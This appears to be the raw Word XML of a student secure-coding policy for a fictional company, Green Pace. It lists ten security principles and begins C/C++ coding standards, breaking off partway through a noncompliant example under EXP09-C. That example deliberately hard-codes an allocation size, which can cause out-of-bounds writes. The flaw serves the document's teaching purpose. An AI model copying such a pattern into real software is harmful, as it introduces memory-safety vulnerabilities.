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bookmarkStart w:id="1" w:name="_Int_GaHd2O5w"/>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bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="38511D92" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="1AE83A24" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc52464054"/>
      <w:r>
        <w:t>Purpose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>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w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Int_WXNLSENt"/>
      <w:r>
        <w:t xml:space="preserve">This article explains the differences between policy, standards, principles, and practices (guidelines and procedure): </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="54BB6B49">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Understanding the Hierarchy of Principles, Policies, Standards, Procedures, and Guidelines</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7A6C2FBF" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="23709CA3" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc52464055"/>
      <w:r>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3235E292" w14:textId="1667E03A" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="5" w:name="_Int_daa55wg8"/>
      <w:r>
        <w:t>This document applies to all staff that create, deploy, or support custom software at Green Pace</w:t>
      </w:r>
      <w:r w:rsidR="00B92A44">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5841CE35" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="6F90B8EB" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc52464056"/>
      <w:r>
        <w:t>Module Three Milestone</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E12FE44" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc52464057"/>
      <w:r>
        <w:t>Ten Core Security Principles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>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542"/>
        <w:gridCol w:w="8238"/>
      </w:tblGrid>
      <w:tr w:rsidR="00381847" w14:paraId="110402A3" w14:textId="77777777" w:rsidTr="5C472B96">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5C472B96">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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Validate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Input Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="49150035" w14:textId="3268B131" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="00A82282">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002244F3">
              <w:t>Validating input data is crucial to prevent security vulnerabilities like SQL injection and buffer overflow attacks. It ensures data integrity by confirming that input data is correct, complete, and within expected parameters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="22FF00E1" w14:textId="77777777" w:rsidTr="5C472B96">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rPr>
              <w:t>Heed Compiler Warnings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="19D888A6" w14:textId="5D938AC9" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="65D51DC5" w:rsidP="5C472B96">
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve">Heeding compiler warnings is essential because </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6Mjg2MzQ5NzE3OA=="/>
                <w:id w:val="318409820"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>these warnings often</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> indicate </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6Mjg2MzQ5NzE3OA=="/>
                <w:id w:val="1072938577"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>potential issues in the code that could lead to</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> bugs, </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6Mjg2MzQ5NzE3OA=="/>
                <w:id w:val="1813960578"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>security vulnerabilities, or</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> unstable behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="7FF9B44A" w14:textId="77777777" w:rsidTr="5C472B96">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11F51825" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="00FF1A78">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002244F3">
              <w:t>Architecting and designing for security policies is crucial because it ensures that security is integrated into the system from the ground up, rather than being an afterthought. By embedding security into the architecture and design phases, developers can identify and mitigate potential vulnerabilities early, reducing the risk of security breaches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="23BA0927" w14:textId="77777777" w:rsidTr="5C472B96">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rPr>
              <w:t>Keep It Simple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="296BB2E0" w14:textId="643D911E" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="582BCCA7" w:rsidP="5C472B96">
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve">Keeping it simple is important </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6Mjg2MjEzOTU1NQ=="/>
                <w:id w:val="982240962"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>in security</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> because simpler systems are </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgxMDY2Mzc2NA=="/>
                <w:id w:val="1623980975"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>easier to</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> understand, </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgxMDY2Mzc2NA=="/>
                <w:id w:val="904775396"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>audit, and maintain</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve">. Complexity increases </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgxMDY2Mzc2NA=="/>
                <w:id w:val="1434277377"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>the likelihood of</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> errors and vulnerabilities, making it harder to identify and fix potential security issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="66B92D07" w14:textId="77777777" w:rsidTr="5C472B96">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rPr>
              <w:t>Default Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="515937A9" w14:textId="36178040" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="002E51C9">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="002244F3">
              <w:t xml:space="preserve">Default </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002244F3">
              <w:t>deny</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002244F3">
              <w:t xml:space="preserve"> is a crucial security principle because it minimizes the risk of unauthorized access by denying access to resources unless explicitly allowed. This approach ensures that only users or processes with explicit permissions can access sensitive data or functions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="4BC1F1C0" w14:textId="77777777" w:rsidTr="5C472B96">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3170055F" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="1F2DA754" w:rsidP="5C472B96">
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve">Adhering to the principle of least privilege is essential because it limits the access rights of </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgwNzYxOTM5NA=="/>
                <w:id w:val="1439434040"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>users and</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> processes to the minimum necessary to perform their functions. This reduces the potential damage from accidents, errors, or malicious actions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="20F4BFFE" w14:textId="77777777" w:rsidTr="5C472B96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2542" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MTk5MzIyMzMwOA=="/>
              <w:id w:val="1098321701"/>
              <w:placeholder>
                <w:docPart w:val="DefaultPlaceholder_1081868574"/>
              </w:placeholder>
              <w15:appearance w15:val="hidden"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6A64234C" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="6C5EA16C" w:rsidP="5C472B96">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="3"/>
                  </w:numPr>
                  <w:ind w:left="342"/>
                  <w:rPr>
                    <w:color w:val="000000" w:themeColor="text1"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="5C472B96">
                  <w:rPr>
                    <w:color w:val="000000" w:themeColor="text1"/>
                  </w:rPr>
                  <w:t>Sanitize Data Sent to Other Systems</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EAAFE91" w14:textId="5AE0FB16" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="7B960E78" w:rsidP="5C472B96">
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve">Sanitizing data sent to other systems is crucial because it prevents the introduction of harmful data </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6Mjg2MjEzOTU1NQ=="/>
                <w:id w:val="92434686"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>that could exploit vulnerabilities in</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> those systems, although the receiving system should </w:t>
            </w:r>
            <w:r w:rsidR="783A6BD2" w:rsidRPr="5C472B96">
              <w:t>validate input data as well.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="00F1B867" w14:textId="77777777" w:rsidTr="5C472B96">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270A3865" w:rsidR="00381847" w:rsidRPr="002244F3" w:rsidRDefault="50068727" w:rsidP="5C472B96">
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve">Practicing defense in depth is essential because it provides </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgxMDY2Mzc2NA=="/>
                <w:id w:val="442027510"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>multiple layers of security</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> controls, ensuring </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgxMDY2Mzc2NA=="/>
                <w:id w:val="1105703198"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>that if one layer fails, others still protect the system. This</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t xml:space="preserve"> approach mitigates </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:tag w:val="tii-similarity-U1VCTUlUVEVEX1dPUktfb2lkOjE6MjgwNzYxOTM5NA=="/>
                <w:id w:val="620656278"/>
                <w:placeholder>
                  <w:docPart w:val="DefaultPlaceholder_1081868574"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="5C472B96">
                  <w:t>the risk of a single point of failure</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="5C472B96">
              <w:t>, making it harder for attackers to penetrate defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="5929F3EC" w14:textId="77777777" w:rsidTr="5C472B96">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249D9A04" w:rsidR="00381847" w:rsidRPr="006625D3" w:rsidRDefault="006625D3">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006625D3">
              <w:t>Using effective quality assurance (QA) techniques is crucial because it helps identify and address security vulnerabilities, bugs, and performance issues early in the development process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="34C295DC" w14:textId="77777777" w:rsidTr="5C472B96">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rPr>
              <w:t>Adopt a Secure Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6BEB1647" w14:textId="2FCD2D2D" w:rsidR="00381847" w:rsidRPr="00787B4B" w:rsidRDefault="00BB59AE">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="00787B4B">
              <w:t xml:space="preserve">Adopting a secure coding standard is essential because it provides clear guidelines and best practices for developing secure software. </w:t>
            </w:r>
            <w:r w:rsidR="00787B4B" w:rsidRPr="00787B4B">
              <w:t>Secure coding standards help enforce consistent coding practices across development teams, promoting a culture of security awareness and accountability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27FBDA56" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847">
      <w:bookmarkStart w:id="8" w:name="_heading=h.kfauw168p7ru" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="03F3DEAD" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc52464058"/>
      <w:r>
        <w:t>C/C++ Ten Coding Standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3DB246A0" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="54BB6B4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10" w:name="_Toc52464059"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="34BFB29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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5033E0B8" w14:textId="6824F07D" w:rsidR="00381847" w:rsidRDefault="002C1980">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>EXP</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>009</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00B47932">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7140E542" w14:textId="20BCFB21" w:rsidR="00381847" w:rsidRDefault="00B47932">
            <w:r w:rsidRPr="00B47932">
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B47932">
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B47932">
              <w:t xml:space="preserve"> to determine the size of a type or variable</w:t>
            </w:r>
            <w:r w:rsidR="00277721">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00426D48" w:rsidRPr="00426D48">
              <w:t>Do not hard code the size of a type into an application. Because of alignment, padding, and differences in basic types (e.g., 32-bit versus 64-bit pointers), the size of most types can vary between compilers and even versions of the same compiler.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="049B2191"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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0AADD11" w:rsidR="00F72634" w:rsidRDefault="00380076" w:rsidP="00A72503">
            <w:r w:rsidRPr="00380076">
              <w:t>This noncompliant code example attempts to declare a two-dimensional array of integers with variable length rows. On a platform with 64-bit integers, the loop will access memory outside the allocated memory section.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3A9A" w14:paraId="195E0CC7"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A68720" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">int f(void) </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>{ /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>* Assuming 32-bit pointer, 32-bit integer */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9AA4ED" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="20B5EAD2" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">  int **matrix = (int *</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>*)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(100, 4);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DFE4224" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">  if (matrix == NULL) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E3C66B3" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">    return -1; /* Indicate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) failure */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E3CB22E" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498C3752" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23332FDD" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">  for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14:paraId="7DBFFA69" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">    matrix[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">] = (int </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>*)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
